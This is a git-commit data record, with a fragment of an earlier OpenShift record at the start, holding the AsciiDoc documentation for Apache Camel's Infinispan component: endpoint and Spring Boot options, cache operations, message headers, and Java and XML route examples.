or\nlink:..\/install_config\/master_node_configuration.html#creating-new-configuration-files[create]\nthe node configuration file on all nodes (*_\/etc\/origin\/node\/node-config.yaml_*\nby default) and update the contents of the `*kubeletArguments*` section:\n\n====\n[source,yaml]\n----\nkubeletArguments:\n cloud-provider:\n - \"gce\"\n\n----\n====\n\n\n\nStart or restart the OpenShift services on the master and all nodes.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"954418f399c3903900d4f0b3a92e3ce21c7b9668","subject":"updating the infinispan documentation","message":"updating the infinispan documentation\n","repos":"zregvart\/camel,adessaigne\/camel,gnodet\/camel,apache\/camel,pmoerenhout\/camel,alvinkwekel\/camel,cunningt\/camel,apache\/camel,apache\/camel,CodeSmell\/camel,pax95\/camel,zregvart\/camel,cunningt\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,objectiser\/camel,cunningt\/camel,christophd\/camel,nicolaferraro\/camel,ullgren\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,zregvart\/camel,alvinkwekel\/camel,mcollovati\/camel,christophd\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,DariusX\/camel,tadayosi\/camel,objectiser\/camel,gnodet\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,DariusX\/camel,pmoerenhout\/camel,mcollovati\/camel,pax95\/camel,adessaigne\/camel,tadayosi\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,apache\/camel,tdiesler\/camel,alvinkwekel\/camel,apache\/camel,cunningt\/camel,CodeSmell\/camel,DariusX\/camel,nikhilvibhav\/camel,tadayosi\/camel,DariusX\/camel,CodeSmell\/camel,tdiesler\/camel,nicolaferraro\/camel,ullgren\/camel,CodeSmell\/camel,mcollovati\/camel,tdiesler\/camel,pax95\/camel,zregvart\/camel,adessaigne\/camel,ullgren\/camel,cunningt\/camel,gnodet\/camel,christophd\/camel,pax95\/camel,objectiser\/camel,mcollovati\/camel,alvinkwekel\/camel,gnodet\/camel,pax95\/camel,objectiser\/camel,nicolaferraro\/camel,christophd\/camel,ullgren\/camel,adessaigne\/camel,christophd\/camel,adessaigne\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tdiesler\/camel,pax95\/camel","old_file":"components\/camel-infinispan\/src\/main\/docs\/infinispan-component.adoc","new_file":"components\/camel-infinispan\/src\/main\/docs\/infinispan-component.adoc","new_contents":"[[infinispan-component]]\n= Infinispan Component\n\n*Available as of Camel version 2.13*\n\nThis component allows you to interact with\nhttp:\/\/infinispan.org\/[Infinispan] distributed data grid \/ cache.\nInfinispan is an extremely scalable, highly available key\/value data\nstore and data grid platform written in Java.\n\nInfinispan requires at least Java 8.\n\nThe `camel-infinispan` component includes the following features:\n\n* *Local Camel Consumer* - Receives cache change notifications and sends them to be processed.\nThis can be done synchronously or asynchronously, and is also supported with a replicated or distributed cache.\n\n* *Local Camel Producer* - A producer creates and sends messages to an endpoint.\nThe `camel-infinispan` producer uses ``GET``, ``PUT``, ``REMOVE``, and `CLEAR` operations.\nThe local producer is also supported with a replicated or distributed cache.\n\n* *Remote Camel Producer* - In Remote Client-Server mode, the Camel producer can send messages using Hot Rod.\n\n* *Remote Camel Consumer* - In Client-Server mode, receives cache change notifications and sends them to be processed.\nThe events are processed asynchronously.\n\nIf you use Maven, you must add the following dependency to your `pom.xml`:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-infinispan<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\n== URI format\n\n[source,java]\n-------------------------------\ninfinispan:\/\/cacheName?[options]\n-------------------------------\n\n== URI Options\n\nThe producer allows sending messages to a local infinispan cache\nconfigured in the registry, or to a remote cache using the HotRod\nprotocol. The consumer allows listening for events from local infinispan cache\naccessible from the registry.\n\n\n\/\/ component options: START\nThe Infinispan component supports 4 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | The default configuration shared among endpoints. | | InfinispanConfiguration\n| *cacheContainer* (common) | The default cache container. | | BasicCacheContainer\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe Infinispan endpoint is configured using URI syntax:\n\n----\ninfinispan:cacheName\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *cacheName* | *Required* The cache to use | | String\n|===\n\n\n=== Query Parameters (21 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *hosts* (common) | Specifies the host of the cache on Infinispan instance | | String\n| *queryBuilder* (common) | Specifies the query builder. | | InfinispanQueryBuilder\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *clusteredListener* (consumer) | If true, the listener will be installed for the entire cluster | false | boolean\n| *command* (consumer) | *Deprecated* The operation to perform. | PUT | String\n| *customListener* (consumer) | Returns the custom listener in use, if provided | | InfinispanCustom Listener\n| *eventTypes* (consumer) | Specifies the set of event types to register by the consumer. Multiple event can be separated by comma. The possible event types are: CACHE_ENTRY_ACTIVATED, CACHE_ENTRY_PASSIVATED, CACHE_ENTRY_VISITED, CACHE_ENTRY_LOADED, CACHE_ENTRY_EVICTED, CACHE_ENTRY_CREATED, CACHE_ENTRY_REMOVED, CACHE_ENTRY_MODIFIED, TRANSACTION_COMPLETED, TRANSACTION_REGISTERED, CACHE_ENTRY_INVALIDATED, DATA_REHASHED, TOPOLOGY_CHANGED, PARTITION_STATUS_CHANGED | | String\n| *sync* (consumer) | If true, the consumer will receive notifications synchronously | true | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. | PUT | InfinispanOperation\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *cacheContainer* (advanced) | Specifies the cache Container to connect | | BasicCacheContainer\n| *cacheContainerConfiguration* (advanced) | The CacheContainer configuration. Uses if the cacheContainer is not defined. Must be the following types: org.infinispan.client.hotrod.configuration.Configuration - for remote cache interaction configuration; org.infinispan.configuration.cache.Configuration - for embedded cache interaction configuration; | | Object\n| *configurationProperties* (advanced) | Implementation specific properties for the CacheManager | | Map\n| *configurationUri* (advanced) | An implementation specific URI for the CacheManager | | String\n| *flags* (advanced) | A comma separated list of Flag to be applied by default on each cache invocation, not applicable to remote caches. | | String\n| *remappingFunction* (advanced) | Set a specific remappingFunction to use in a compute operation | | BiFunction\n| *resultHeader* (advanced) | Store the operation result in a header instead of the message body. By default, resultHeader == null and the query result is stored in the message body, any existing content in the message body is discarded. If resultHeader is set, the value is used as the name of the header to store the query result and the original message body is preserved. This value can be overridden by an in message header named: CamelInfinispanOperationResultHeader | | Object\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-infinispan-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 23 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.infinispan.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.infinispan.cache-container* | The default cache container. The option is a org.infinispan.commons.api.BasicCacheContainer type. | | String\n| *camel.component.infinispan.configuration.cache-container* | Specifies the cache Container to connect | | BasicCacheContainer\n| *camel.component.infinispan.configuration.cache-container-configuration* | The CacheContainer configuration. Uses if the cacheContainer is not defined. Must be the following types: org.infinispan.client.hotrod.configuration.Configuration - for remote cache interaction configuration; org.infinispan.configuration.cache.Configuration - for embedded cache interaction configuration; | | Object\n| *camel.component.infinispan.configuration.clustered-listener* | If true, the listener will be installed for the entire cluster | false | Boolean\n| *camel.component.infinispan.configuration.configuration-properties* | Implementation specific properties for the CacheManager | | Map\n| *camel.component.infinispan.configuration.configuration-uri* | An implementation specific URI for the CacheManager | | String\n| *camel.component.infinispan.configuration.custom-listener* | Returns the custom listener in use, if provided | | InfinispanCustom Listener\n| *camel.component.infinispan.configuration.event-types* | Specifies the set of event types to register by the consumer. Multiple event can be separated by comma. <p\/> The possible event types are: CACHE_ENTRY_ACTIVATED, CACHE_ENTRY_PASSIVATED, CACHE_ENTRY_VISITED, CACHE_ENTRY_LOADED, CACHE_ENTRY_EVICTED, CACHE_ENTRY_CREATED, CACHE_ENTRY_REMOVED, CACHE_ENTRY_MODIFIED, TRANSACTION_COMPLETED, TRANSACTION_REGISTERED, CACHE_ENTRY_INVALIDATED, DATA_REHASHED, TOPOLOGY_CHANGED, PARTITION_STATUS_CHANGED | | Set\n| *camel.component.infinispan.configuration.flags* | A comma separated list of Flag to be applied by default on each cache invocation, not applicable to remote caches. | | Flag[]\n| *camel.component.infinispan.configuration.hosts* | Specifies the host of the cache on Infinispan instance | | String\n| *camel.component.infinispan.configuration.operation* | The operation to perform. | | InfinispanOperation\n| *camel.component.infinispan.configuration.query-builder* | Specifies the query builder. | | InfinispanQueryBuilder\n| *camel.component.infinispan.configuration.remapping-function* | Set a specific remappingFunction to use in a compute operation | | BiFunction\n| *camel.component.infinispan.configuration.result-header* | Store the operation result in a header instead of the message body. By default, resultHeader == null and the query result is stored in the message body, any existing content in the message body is discarded. If resultHeader is set, the value is used as the name of the header to store the query result and the original message body is preserved. This value can be overridden by an in message header named: CamelInfinispanOperationResultHeader | | Object\n| *camel.component.infinispan.configuration.sync* | If true, the consumer will receive notifications synchronously | true | Boolean\n| *camel.component.infinispan.customizer.embedded-cache-manager.enabled* | Enable or disable the cache-manager customizer. | true | Boolean\n| *camel.component.infinispan.customizer.embedded-cache-manager.override* | Configure if the cache manager eventually set on the component should be overridden by the customizer. | false | Boolean\n| *camel.component.infinispan.customizer.remote-cache-manager.enabled* | Enable or disable the cache-manager customizer. | true | Boolean\n| *camel.component.infinispan.customizer.remote-cache-manager.override* | Configure if the cache manager eventually set on the component should be overridden by the customizer. | false | Boolean\n| *camel.component.infinispan.enabled* | Enable infinispan component | true | Boolean\n| *camel.component.infinispan.resolve-property-placeholders* | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | Boolean\n| *camel.component.infinispan.configuration.command* | *Deprecated* The operation to perform. | PUT | String\n|===\n\/\/ spring-boot-auto-configure options: END\n\n== Camel Operations\nThis section lists all available operations, along with their header information.\n\n.Put Operations\n[cols=\"40%,60%\", frame=\"all\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.PUT\n| *Context*: Embedded \/ Remote\n\n*Description*: Puts a key\/value pair in the cache, optionally with expiration\n\n*Required Headers*: CamelInfinispanKey, CamelInfinispanValue\n\n*Optional Headers*: CamelInfinispanLifespanTime, CamelInfinispanLifespanTimeUnit, CamelInfinispanMaxIdleTime, CamelInfinispanMaxIdleTimeUnit, CamelInfinispanIgnoreReturnValues\n\n*Result Header*: CamelInfinispanOperationResult\n\n| InfinispanOperation.PUTASYNC\n| *Description*: Asynchronously puts a key\/value pair in the cache, optionally with expiration\n\n\n| InfinispanOperation.PUTIFABSENT\n| *Description*: Puts a key\/value pair in the cache if it did not exist, optionally with expiration\n\n\n| InfinispanOperation.PUTIFABSENTASYNC\n| *Description*: Asynchronously puts a key\/value pair in the cache if it did not exist, optionally with expiration\n\n|===\n\n.Put All Operations\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.PUTALL\n| *Context*: Embedded \/ Remote\n\n*Description*: Adds multiple entries to a cache, optionally with expiration\n\n*Required Headers*: CamelInfinispanMap\n\n*Optional Headers*: CamelInfinispanLifespanTime, CamelInfinispanLifespanTimeUnit, CamelInfinispanMaxIdleTime, CamelInfinispanMaxIdleTimeUnit\n\n*Result Header*: None\n\n| CamelInfinispanOperation.PUTALLASYNC\n| *Description*: Asynchronously adds multiple entries to a cache, optionally with expiration\n\n|===\n\n.Get Operations\n[cols=\"40%,60%\", frame=\"all\", options=\"header\"]\n|===\n|Operation Name\n|Description\n\n| InfinispanOperation.GET\n| *Context*: Embedded \/ Remote\n\n*Description*: Retrieves the value associated with a specific key from the cache\n\n*Required Headers*: CamelInfinispanKey\n\n*Optional Headers*: None\n\n*Result Header*: None\n\n| InfinispanOperation.GETORDEFAULT\n| *Context*: Embedded \/ Remote\n\n*Description*: Retrieves the value, or default value, associated with a specific key from the cache\n\n*Required Headers*: CamelInfinispanKey\n\n*Optional Headers*: None\n\n*Result Header*: None\n|===\n\n.Contains Key Operation\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.CONTAINSKEY\n| *Context*: Embedded \/ Remote\n\n*Description*: Determines whether a cache contains a specific key\n\n*Required Headers*: CamelInfinispanKey\n\n*Optional Headers*: None\n\n*Result Header*: CamelInfinispanOperationResult\n|===\n\n.Contains Value Operation\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.CONTAINSVALUE\n| *Context*: Embedded \/ Remote\n\n*Description*: Determines whether a cache contains a specific value\n\n*Required Headers*: CamelInfinispanKey\n\n*Optional Headers*: None\n\n*Result Headers*: None\n|===\n\n.Remove Operations\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.REMOVE\n| *Context*: Embedded \/ Remote\n\n*Description*: Removes an entry from a cache, optionally only if the value matches a given one\n\n*Required Headers*: CamelInfinispanKey\n\n*Optional Headers*: CamelInfinispanValue\n\n*Result Header*: CamelInfinispanOperationResult\n\n| InfinispanOperation.REMOVEASYNC\n| *Description*: Asynchronously removes an entry from a cache, optionally only if the value matches a given one\n\n|===\n\n.Replace Operations\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.REPLACE\n| *Context*: Embedded \/ Remote\n\n*Description*: Conditionally replaces an entry in the cache, optionally with expiration\n\n*Required Headers*: CamelInfinispanKey, CamelInfinispanValue, CamelInfinispanOldValue\n\n*Optional Headers*: CamelInfinispanLifespanTime, CamelInfinispanLifespanTimeUnit, CamelInfinispanMaxIdleTime, CamelInfinispanMaxIdleTimeUnit, CamelInfinispanIgnoreReturnValues\n\n*Result Header*: CamelInfinispanOperationResult\n\n| InfinispanOperation.REPLACEASYNC\n| *Description*: Asynchronously conditionally replaces an entry in the cache, optionally with expiration\n\n|===\n\n.Clear Operations\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.CLEAR\n| *Context*: Embedded \/ Remote\n\n*Description*: Clears the cache\n\n*Required Headers*: None\n\n*Optional Headers*: None\n\n*Result Header*: None\n\n| InfinispanOperation.CLEARASYNC\n| *Context*: Embedded \/ Remote\n\n*Description*: Asynchronously clears the cache\n\n*Required Headers*: None\n\n*Optional Headers*: None\n\n*Result Header*: None\n|===\n\n.Size Operation\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.SIZE\n| *Context*: Embedded \/ Remote\n\n*Description*: Returns the number of entries in the cache\n\n*Required Headers*: None\n\n*Optional Headers*: None\n\n*Result Header*: CamelInfinispanOperationResult\n|===\n\n.Stats Operation\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.STATS\n| *Context*: Embedded \/ Remote\n\n*Description*: Returns statistics about the cache\n\n*Required Headers*: None\n\n*Optional Headers*: None\n\n*Result Header*: CamelInfinispanOperationResult\n|===\n\n.Query Operation\n[cols=\"40%,60%\", options=\"header\"]\n|===\n| Operation Name\n| Description\n\n| InfinispanOperation.QUERY\n| *Context*: Remote\n\n*Description*: Executes a query on the cache\n\n*Required Headers*: CamelInfinispanQueryBuilder\n\n*Optional Headers*: None\n\n*Result Header*: CamelInfinispanOperationResult\n|===\n\n[NOTE]\n====\nAny operations that take `CamelInfinispanIgnoreReturnValues` will receive a null result.\n====\n\n\n\n== Message Headers\n\n[width=\"100%\",cols=\"10%,10%,10%,10%,60%\",options=\"header\",]\n|=======================================================================\n|Name |Default Value |Type |Context |Description\n|CamelInfinispanCacheName |`null` |String |Shared |The cache participating in the operation or event.\n|CamelInfinispanOperation |`PUT` |InfinispanOperation |Producer |The operation to perform.\n|CamelInfinispanMap |`null` |Map |Producer |A Map to use in case of CamelInfinispanOperationPutAll operation\n|CamelInfinispanKey |`null` |Object |Shared |The key to perform the operation to or the key generating the event.\n|CamelInfinispanValue |`null` |Object |Producer |The value to use for the operation.\n|CamelInfinispanEventType |`null` |String |Consumer |The type of the received event. Possible values defined here org.infinispan.notifications.cachelistener.event.Event.Type\n|CamelInfinispanIsPre |`null` |Boolean |Consumer |Infinispan fires two events for each operation: one before and one after the operation.\n|CamelInfinispanLifespanTime |`null` |long |Producer |The Lifespan time of a value inside the cache. Negative values are interpreted as infinity.\n|CamelInfinispanTimeUnit |`null` |String |Producer |The Time Unit of an entry Lifespan Time.\n|CamelInfinispanMaxIdleTime |`null` |long |Producer |The maximum amount of time an entry is allowed to be idle for before it is considered as expired.\n|CamelInfinispanMaxIdleTimeUnit |`null` |String |Producer |The Time Unit of an entry Max Idle Time.\n|CamelInfinispanQueryBuilder |null |InfinispanQueryBuilder |Producer |The QueryBuilde to use for QUERY command, if not present the command defaults to InifinispanConfiguration's one\n|CamelInfinispanIgnoreReturnValues |null |Boolean |Producer |If this header is set, the return value for cache operation returning something is ignored by the client application\n|CamelInfinispanOperationResultHeader |null |String |Producer |Store the operation result in a header instead of the message body\n|=======================================================================\n\n== Examples\n\n* Retrieve a specific key from the default cache using a custom cache container:\n\n[source,java]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan?cacheContainer=#cacheContainer\");\n----\n\n\n* Retrieve a specific key from a named cache:\n+\n[source,java]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.PUT)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan:myCacheName\");\n----\n\n* Put a value with lifespan\n\n[source,java]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .setHeader(InfinispanConstants.LIFESPAN_TIME).constant(100L)\n .setHeader(InfinispanConstants.LIFESPAN_TIME_UNIT.constant(TimeUnit.MILLISECONDS.toString())\n .to(\"infinispan:myCacheName\");\n----\n\n* Compute operation through a remapping function on the default cache using a custom cache container:\n\n[source,java]\n----\n@BindToRegistry(\"mappingFunction\")\nBiFunction<String, String, String> comp = (k, v) -> v + \"replay\"; \n\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.COMPUTE)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan?cacheContainer=#cacheContainer&remappingFunction=#mappingFunction\");\n----\n\nThis will return oldValue + \"replay\".\n\nThis can be done also as async operation, with the `InfinispanOperation.COMPUTEASYNC` operation\n\n* Retrieve a specific key from the remote cache using a cache container configuration with additional parameters (host, port and protocol version):\n\n[source,java]\n----\norg.infinispan.client.hotrod.configuration.Configuration cacheContainerConfiguration = new org.infinispan.client.hotrod.configuration.ConfigurationBuilder()\n .addServer()\n .host(\"localhost\")\n .port(9999)\n .version(org.infinispan.client.hotrod.ProtocolVersion.PROTOCOL_VERSION_25)\n .build();\n...\n\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION).constant(InfinispanOperation.GET)\n .setHeader(InfinispanConstants.KEY).constant(\"123\")\n .to(\"infinispan?cacheContainerConfiguration=#cacheContainerConfiguration\");\n----\n\n\n\n=== XML examples\n\nRouting can also be performed using XML configuration.\nThe following example demonstrates `camel-infinispan` `local-camel-producer`, a camel route that sends data to an embedded cache created by the `local-cache` module.\n\n[source,java,options=\"nowrap\"]\n----\n<camelContext id=\"local-producer\" xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"timer:\/\/local?fixedRate=true&period=5000\"\/>\n <setHeader headerName=\"CamelInfinispanKey\">\n <constant>CamelTimerCounter<\/constant>\n <\/setHeader>\n <setHeader headerName=\"CamelInfinispanValue\">\n <constant>CamelTimerCounter<\/constant>\n <\/setHeader>\n <to uri=\"infinispan:\/\/foo?cacheContainer=#cacheManager\"\/>\n <to uri=\"log:local-put?showAll=true\"\/>\n <\/route>\n<\/camelContext>\n----\n\n\nThe provided example requires you to instantiate the [class]``cacheManager``.\n\nYou can instantiate the [class]``cacheManager`` bean for Spring XML as follows:\n\n[source,xml,options=\"nowrap\"]\n----\n<bean id=\"cacheManager\" class=\"org.infinispan.manager.DefaultCacheManager\" init-method=\"start\" destroy-method=\"stop\">\n <constructor-arg type=\"java.lang.String\" value=\"infinispan.xml\"\/>\n<\/bean>\n----\n\n\nThe following demonstrates how to instantiate the [class]``cacheManager`` bean using Blueprint XML.\n\n[source,xml,options=\"nowrap\"]\n----\n<bean id=\"cacheManager\" class=\"org.infinispan.manager.DefaultCacheManager\" init-method=\"start\" destroy-method=\"stop\">\n <argument value=\"infinispan.xml\" \/>\n<\/bean>\n----\n\n[NOTE]\n====\nBoth the Spring XML and Blueprint XML examples use the configuration file [path]_infinispan.xml_\n for configuration of the cache. This file must be present on the classpath.\n====\n\n\n== Remote Query\n\nWhen executing remote queries the cacheManager must be an instance of ``RemoteCacheManager``, and an example configuration utilizing a `RemoteCacheManager` is found below for both Java and blueprint.xml: \n\n.Using only Java\n====\n[source,java,options=\"nowrap\"]\n----\nfrom(\"direct:start\")\n .setHeader(InfinispanConstants.OPERATION, InfinispanConstants.QUERY)\n .setHeader(InfinispanConstants.QUERY_BUILDER,\n new InfinispanQueryBuilder() {\n public Query build(QueryFactory<Query> queryFactory) {\n return queryFactory.from(User.class).having(\"name\").like(\"%abc%\")\n .build();\n }\n })\n .to(\"infinispan:\/\/localhost?cacheContainer=#cacheManager&cacheName=remote_query_cache\") ;\n----\n====\n\n.Using Blueprint and Java\n====\n.Java [class]``RemoteCacheManagerFactory`` class: \n[source,java,options=\"nowrap\"]\n----\npublic class RemoteCacheManagerFactory { \n ConfigurationBuilder clientBuilder;\n public RemoteCacheManagerFactory(String hostname, int port) {\n clientBuilder = new ConfigurationBuilder();\n clientBuilder.addServer()\n .host(hostname).port(port);\n }\n public RemoteCacheManager newRemoteCacheManager() {\n return new RemoteCacheManager(clientBuilder.build());\n }\n}\n----\n.Java [class]``InfinispanQueryExample`` class: \n[source,java,options=\"nowrap\"]\n----\npublic class InfinispanQueryExample {\n public InfinispanQueryBuilder getBuilder() {\n return new InfinispanQueryBuilder() {\n public Query build(QueryFactory<Query> queryFactory) {\n return queryFactory.from(User.class)\n .having(\"name\")\n .like(\"%abc%\")\n .build();\n }\n }\n }\n}\n----\n.blueprint.xml: \n[source,xml,options=\"nowrap\"]\n----\n<bean id=\u201dremoteCacheManagerFactory\u201d class=\u201ccom.datagrid.RemoteCacheManagerFactory\u201d> \n <argument value=\u201dlocalhost\u201d\/> \n <argument value=\"11222\u201d\/> \n<\/bean>\n \n<bean id=\u201dcacheManager\u201d\n factory-ref=\u201dremoteCacheManagerFactory\u201d \n factory-method=\u201cnewRemoteCacheManager\u201d> \n<\/bean>\n\n<bean id=\"queryBuilder\" class=\"org.example.com.InfinispanQueryExample\"\/>\n\n<camelContext id=\"route\" xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"direct:start\"\/>\n <setHeader headerName=\"CamelInfinispanOperation\">\n <constant>CamelInfinispanOperationQuery<\/constant>\n <\/setHeader>\n <setHeader headerName=\"CamelInfinispanQueryBuilder\">\n <method ref=\"queryBuilder\" method=\"getBuilder\"\/>\n <\/setHeader>\n <to uri=\"infinispan:\/\/localhost?cacheContainer=#cacheManager&cacheName=remote_query_cache\"\/>\n <\/route>\n<\/camelContext>\n----\n====\n\nThe `remote_query_cache` is an arbitrary name for a cache that holds the data, and the results of the query will be a list of domain objects stored as a `CamelInfinispanOperationResult` header. \n\nIn addition, there are the following requirements: \n\n* The [class]``RemoteCacheManager`` must be configured to use [class]``ProtoStreamMarshaller``. \n* The [class]``ProtoStreamMarshaller`` must be registered with the [class]``RemoteCacheManager``'s serialization context. \n* The .proto descriptors for domain objects must be registered with the remote Data Grid server. \n\n\n== Custom Listeners for Embedded Cache\n\nCustom Listeners for an embedded cache can be registered through the [parameter]``customListener`` parameter as shown below: \n\n.Using Java\n\n[source,java,options=\"nowrap\"]\n----\nfrom(\"infinispan:\/\/?cacheContainer=#myCustomContainer&cacheName=customCacheName&customListener=#myCustomListener\")\n .to(\"mock:result\");\n----\n\n.Using Blueprint\n\n[source,xml,options=\"nowrap\"]\n----\n<bean id=\"myCustomContainer\" org.infinispan.manager.DefaultCacheManager\"\n init-method=\"start\" destroy-method=\"stop\">\n <argument value=\"infinispan.xml\" \/>\n<\/bean>\n\n<bean id=\"myCustomListener\" class=\"org.example.com.CustomListener\"\/>\n \n<camelContext id=\"route\" xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"infinispan:\/\/?cacheContainer=#myCustomContainer&cacheName=customCacheName&customListener=#myCustomListener\"\/>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n\n\nThe instance of [class]``myCustomListener`` must exist.\nUsers are encouraged to extend the [class]``org.apache.camel.component.infinispan.embedded.InfinispanEmbeddedCustomListener`` and annotate the resulting class with the `@Listener` annotation from [package]#org.infinispan.notifications#\n. \n\n[NOTE]\n====\nCustom filters and converters for embedded caches are currently not supported. \n====\n\n\n== Custom Listeners for Remote Cache\n\nCustom listeners for a remote cache can be registered in the same way as an embedded cache, with the exception that [parameter]``sync=false`` must be present.\nFor instance: \n\n.Using only Java\n====\n[source,java,options=\"nowrap\"]\n----\nfrom(infinispan:\/\/?cacheContainer=#cacheManager&sync=false&customListener=#myCustomListener\")\n .to(mock:result);\n----\n====\n\n.Using Blueprint and Java\n====\n.Java class: \n[source,java,options=\"nowrap\"]\n----\n\npublic class RemoteCacheManagerFactory { \n ConfigurationBuilder clientBuilder;\n public RemoteCacheManagerFactory(String hostname, int port) {\n clientBuilder = new ConfigurationBuilder();\n clientBuilder.addServer()\n .host(hostname).port(port);\n }\n public RemoteCacheManager newRemoteCacheManager() {\n return new RemoteCacheManager(clientBuilder.build());\n }\n}\n----\n.blueprint.xml: \n[source,xml,options=\"nowrap\"]\n----\n<bean id=\u201dremoteCacheManagerFactory\u201d class=\u201ccom.datagrid.RemoteCacheManagerFactory\u201d> \n <argument value=\u201dlocalhost\u201d\/> \n <argument value=\"11222\u201d\/> \n<\/bean>\n \n<bean id=\u201dcacheManager\u201d\n factory-ref=\u201dremoteCacheManagerFactory\u201d \n factory-method=\u201cnewRemoteCacheManager\u201d> \n<\/bean>\n\n<bean id=\"myCustomListener\" class=\"org.example.com.CustomListener\"\/>\n\n<camelContext id=\"route\" xmlns=\"http:\/\/camel.apache.org\/schema\/blueprint\">\n <route>\n <from uri=\"infinispan:\/\/?cacheContainer=#cacheManager&sync=false&customListener=#myCustomListener\"\/>\n <to uri=\"mock:result\"\/>\n <\/route>\n<\/camelContext>\n----\n====\n\nThe instance of [class]``myCustomListener`` must exist.\nUsers are encouraged to extend the [class]``org.apache.camel.component.infinispan.remote.InfinispanRemoteCustomListener`` class and annotate the resulting class with ``@ClientListener``; this annotation is found in [package]#org.infinispan.client.hotrod.annotation#\n. \n\nRemote listeners may also be associated with custom filters and converters as shown below: \n[source,java,options=\"nowrap\"]\n----\n@ClientListener(includeCurrentState=true, filterFactoryName = \"static-filter-factory\", converterFactoryName = \"static-converter-factory\")\n private static class MyCustomListener extends InfinispanRemoteCustomListener {\n}\n----\n\nIn order to use custom filters or converters classes annotated with `@NamedFactory` must be implemented.\nA 